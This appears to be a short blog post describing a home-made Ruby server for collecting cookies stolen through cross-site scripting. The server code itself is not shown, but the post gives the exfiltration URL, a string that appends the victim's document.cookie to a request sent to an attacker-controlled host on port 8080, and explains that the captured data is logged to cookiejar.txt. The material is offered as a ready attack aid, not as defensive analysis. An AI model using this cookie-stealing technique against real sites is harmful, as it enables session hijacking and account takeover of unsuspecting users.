So I did a quick google search for simple cookie catching scripts, only they were pretty much all in PHP. So I decided to whip up something quick in ruby. And so, without further ado...
There you go. The XSS script needs to make the browser issue an HTTP GET request to the ruby server; the url can look like anything, just include a '?' followed by a query string containing the desired data (like a cookie). The url I build looks like:
"http://blahblah.com:8080/hai?"+document.cookie
You can pass as much data in the query string as you'd like, and all the results are written out to cookiejar.txt.
